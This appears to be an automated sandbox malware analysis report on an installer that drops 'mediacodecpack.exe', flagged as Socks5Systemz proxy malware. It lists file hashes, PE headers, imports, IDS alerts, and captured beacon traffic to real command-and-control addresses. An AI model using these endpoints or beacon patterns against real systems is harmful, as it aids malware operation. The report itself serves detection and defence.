                                                                                      SHA-512:B299367DF684BC218723BC478435CAD8F40F7ABD43B5B4DE78F00D0BF4C0EB06639788C26DA64046FDCF2EE850F6D645BF843DB11516497E42C58A14498A835C
                                                                                      Malicious:true
                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\newwork.exe.1.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):706560
                                                                                      Entropy (8bit):6.506374420963084
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:NTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyF:FPcYn5c/rPx37/zHBA6pFptZ1CENqMRU
                                                                                      MD5:ED6A19AD054AD0172201AF725324781B
                                                                                      SHA1:817F409DBE431AE71D3AB4D70181257C3BEE4DBD
                                                                                      SHA-256:79DB034686A25A6BA5DEF19B0CDEDB7097A78F994FB4A1CD33765E0FD49C9423
                                                                                      SHA-512:D5D67F03F50D6EED159BB967735B9AE2ADDA579110D35A23A76BC2DF2B023122805C64E913A2A333B45EE8412F799BAC1538C8D4573DCDA7BB8147ACB6445729
                                                                                      Malicious:true
                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2560
                                                                                      Entropy (8bit):2.8818118453929262
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                      MD5:A69559718AB506675E907FE49DEB71E9
                                                                                      SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                      SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                      SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):6144
                                                                                      Entropy (8bit):4.289297026665552
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                                      MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                                      SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                                                      SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                                      SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):23312
                                                                                      Entropy (8bit):4.596242908851566
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                      MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                      SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                      SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                      SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.997606116225022
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 98.73%
                                                                                      • Inno Setup installer (109748/4) 1.08%
                                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      File name:newwork.exe.1.exe
                                                                                      File size:3'314'669 bytes
                                                                                      MD5:27b4fa67c0810bc212077971a00854ea
                                                                                      SHA1:39d4dbe69f339c608a3f9ecf7f718c25e1c0dfbb
                                                                                      SHA256:2fc18ce155e0b723ffe70b0ed7fa5ff85a03b50d90367e8a1c5591e88af2089e
                                                                                      SHA512:bdb5c6f3fa1ea7b99df763f02919e044882b581bb6ad308da52a7885bb308ca70eaa477dc84bbde627427acb013d8fadf5694c3168cfa580f7a0978574f13018
                                                                                      SSDEEP:98304:MfMeg4PkQUbNkhS0F6p1bfXNLDYtNmeJX2:g9PknkhSj1bf9LsmeF2
                                                                                      TLSH:FFE533FE7F84DD32F23604B95B2601BAC32B3D68196BA26837DD2C9E1F111A16971371
                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                      Icon Hash:2d2e3797b32b2b99
                                                                                      Entrypoint:0x40a5f8
                                                                                      Entrypoint Section:CODE
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:1
                                                                                      OS Version Minor:0
                                                                                      File Version Major:1
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:1
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                      Instruction
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      add esp, FFFFFFC4h
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      xor eax, eax
                                                                                      mov dword ptr [ebp-10h], eax
                                                                                      mov dword ptr [ebp-24h], eax
                                                                                      call 00007F8110BA3043h
                                                                                      call 00007F8110BA424Ah
                                                                                      call 00007F8110BA44D9h
                                                                                      call 00007F8110BA457Ch
                                                                                      call 00007F8110BA651Bh
                                                                                      call 00007F8110BA8E86h
                                                                                      call 00007F8110BA8FEDh
                                                                                      xor eax, eax
                                                                                      push ebp
                                                                                      push 0040ACC9h
                                                                                      push dword ptr fs:[eax]
                                                                                      mov dword ptr fs:[eax], esp
                                                                                      xor edx, edx
                                                                                      push ebp
                                                                                      push 0040AC92h
                                                                                      push dword ptr fs:[edx]
                                                                                      mov dword ptr fs:[edx], esp
                                                                                      mov eax, dword ptr [0040C014h]
                                                                                      call 00007F8110BA9A9Bh
                                                                                      call 00007F8110BA9686h
                                                                                      cmp byte ptr [0040B234h], 00000000h
                                                                                      je 00007F8110BAA57Eh
                                                                                      call 00007F8110BA9B98h
                                                                                      xor eax, eax
                                                                                      call 00007F8110BA3D39h
                                                                                      lea edx, dword ptr [ebp-10h]
                                                                                      xor eax, eax
                                                                                      call 00007F8110BA6B2Bh
                                                                                      mov edx, dword ptr [ebp-10h]
                                                                                      mov eax, 0040CE28h
                                                                                      call 00007F8110BA30DAh
                                                                                      push 00000002h
                                                                                      push 00000000h
                                                                                      push 00000001h
                                                                                      mov ecx, dword ptr [0040CE28h]
                                                                                      mov dl, 01h
                                                                                      mov eax, 0040738Ch
                                                                                      call 00007F8110BA73BAh
                                                                                      mov dword ptr [0040CE2Ch], eax
                                                                                      xor edx, edx
                                                                                      push ebp
                                                                                      push 0040AC4Ah
                                                                                      push dword ptr fs:[edx]
                                                                                      mov dword ptr fs:[edx], esp
                                                                                      call 00007F8110BA9AF6h
                                                                                      mov dword ptr [0040CE34h], eax
                                                                                      mov eax, dword ptr [0040CE34h]
                                                                                      cmp dword ptr [eax+0Ch], 00000000h
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      CODE0x10000x9d300x9e00c3bd95c4b1a8e5199981e0d9b45fd18cFalse0.6052709651898734data6.631765876950794IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      DATA0xb0000x2500x4001ee71d84f1c77af85f1f5c278f880572False0.306640625data2.751820662285145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      BSS0xc0000xe8c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x100000x8c40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x110000x2c000x2c000c0c7ee3853390cc0c21088a78f34d65False0.32555042613636365data4.491927698819795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                      RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                      RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                      RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                      RT_STRING0x125740x2f2data0.35543766578249336
                                                                                      RT_STRING0x128680x30cdata0.3871794871794872
                                                                                      RT_STRING0x12b740x2cedata0.42618384401114207
                                                                                      RT_STRING0x12e440x68data0.75
                                                                                      RT_STRING0x12eac0xb4data0.6277777777777778
                                                                                      RT_STRING0x12f600xaedata0.5344827586206896
                                                                                      RT_RCDATA0x130100x2cdata1.1818181818181819
                                                                                      RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                                      RT_VERSION0x1307c0x4f4dataEnglishUnited States0.2610410094637224
                                                                                      RT_MANIFEST0x135700x5a4XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.42590027700831024
                                                                                      DLLImport
                                                                                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                      user32.dllMessageBoxA
                                                                                      oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                                      kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                      user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                                      comctl32.dllInitCommonControls
                                                                                      advapi32.dllAdjustTokenPrivileges
                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      DutchNetherlands
                                                                                      EnglishUnited States
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-12-18T13:59:10.577867+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449887188.119.66.185443TCP
                                                                                      2024-12-18T13:59:11.506476+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449887188.119.66.185443TCP
                                                                                      2024-12-18T13:59:16.363973+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449904188.119.66.185443TCP
                                                                                      2024-12-18T13:59:17.056119+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449904188.119.66.185443TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 18, 2024 13:59:08.884258032 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:08.884345055 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:08.884437084 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:08.901068926 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:08.901108027 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:10.577692032 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:10.577867031 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:10.638515949 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:10.638576984 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:10.639765978 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:10.639851093 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:10.643642902 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:10.687334061 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:11.506510973 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:11.506561041 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:11.506578922 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:11.506591082 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:11.506613970 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:11.506633997 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:11.520374060 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:11.520406008 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:11.521347046 CET498962024192.168.2.446.8.225.74
                                                                                      Dec 18, 2024 13:59:11.641547918 CET20244989646.8.225.74192.168.2.4
                                                                                      Dec 18, 2024 13:59:11.641669989 CET498962024192.168.2.446.8.225.74
                                                                                      Dec 18, 2024 13:59:11.641755104 CET498962024192.168.2.446.8.225.74
                                                                                      Dec 18, 2024 13:59:11.761507988 CET20244989646.8.225.74192.168.2.4
                                                                                      Dec 18, 2024 13:59:11.761590004 CET498962024192.168.2.446.8.225.74
                                                                                      Dec 18, 2024 13:59:11.881269932 CET20244989646.8.225.74192.168.2.4
                                                                                      Dec 18, 2024 13:59:12.895978928 CET20244989646.8.225.74192.168.2.4
                                                                                      Dec 18, 2024 13:59:12.939534903 CET498962024192.168.2.446.8.225.74
                                                                                      Dec 18, 2024 13:59:14.910294056 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:14.910351992 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:14.910422087 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:14.910841942 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:14.910861015 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:16.363851070 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:16.363972902 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:16.364506960 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:16.364511967 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:16.364682913 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:16.364687920 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:17.056241035 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:17.056313038 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:17.056349993 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:17.056400061 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:17.056431055 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 18, 2024 13:59:17.056488991 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:17.056596041 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 18, 2024 13:59:17.056612015 CET44349904188.119.66.185192.168.2.4
                                                                                      • 188.119.66.185
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.449887188.119.66.1854436172C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-18 12:59:10 UTC283OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd5388a HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                      Host: 188.119.66.185
                                                                                      2024-12-18 12:59:11 UTC200INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Wed, 18 Dec 2024 12:59:11 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      X-Powered-By: PHP/7.4.33
                                                                                      2024-12-18 12:59:11 UTC768INData Raw: 32 66 34 0d 0a 38 62 37 32 33 63 36 38 65 65 31 38 34 30 33 63 36 36 30 66 62 66 65 30 33 38 34 62 32 30 62 36 62 36 39 30 38 36 33 65 34 38 61 36 33 62 64 62 38 34 37 35 64 63 32 63 31 66 64 34 30 33 63 32 64 31 36 30 35 34 65 37 31 38 63 33 34 32 37 61 32 61 37 33 38 61 62 32 31 35 66 39 61 64 34 30 64 63 38 36 62 31 63 65 33 35 36 62 64 33 66 34 35 35 64 62 39 37 66 32 34 66 64 64 64 33 39 66 35 35 61 63 62 64 66 35 63 35 30 61 31 64 63 36 64 35 30 37 30 30 64 63 33 32 32 36 30 37 64 32 33 32 38 39 64 65 64 33 39 34 35 64 34 38 63 32 37 39 33 31 65 37 64 66 30 30 34 62 36 65 31 34 37 37 64 33 66 31 31 30 37 66 62 33 66 32 35 66 61 65 65 65 65 30 35 35 61 32 36 61 63 37 63 65 32 30 65 62 66 31 63 34 65 65 35 34 31 33 38 66 35 32 39 39 33 65 61 66 33 34
                                                                                      Data Ascii: 2f48b723c68ee18403c660fbfe0384b20b6b690863e48a63bdb8475dc2c1fd403c2d16054e718c3427a2a738ab215f9ad40dc86b1ce356bd3f455db97f24fddd39f55acbdf5c50a1dc6d50700dc322607d23289ded3945d48c27931e7df004b6e1477d3f1107fb3f25faeeee055a26ac7ce20ebf1c4ee54138f52993eaf34


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449904188.119.66.1854436172C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-18 12:59:16 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d49c5b HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                      Host: 188.119.66.185
                                                                                      2024-12-18 12:59:17 UTC200INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Wed, 18 Dec 2024 12:59:16 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      X-Powered-By: PHP/7.4.33
                                                                                      2024-12-18 12:59:17 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: e8b723663ec13250


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:07:57:04
                                                                                      Start date:18/12/2024
                                                                                      Path:C:\Users\user\Desktop\newwork.exe.1.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\newwork.exe.1.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:3'314'669 bytes
                                                                                      MD5 hash:27B4FA67C0810BC212077971A00854EA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:1
                                                                                      Start time:07:57:04
                                                                                      Start date:18/12/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp" /SL5="$1041E,3065697,56832,C:\Users\user\Desktop\newwork.exe.1.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:706'560 bytes
                                                                                      MD5 hash:ED6A19AD054AD0172201AF725324781B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.3557131784.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:2
                                                                                      Start time:07:57:05
                                                                                      Start date:18/12/2024
                                                                                      Path:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i
                                                                                      Imagebase:0x400000
                                                                                      File size:3'193'465 bytes
                                                                                      MD5 hash:49FC2D4BA26F2EEF94CCC6B71EB0AD96
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000002.00000002.3557079797.0000000002B40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000002.00000000.1708594819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:21.5%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:2.4%
                                                                                        Total number of Nodes:1520
                                                                                        Total number of Limit Nodes:22
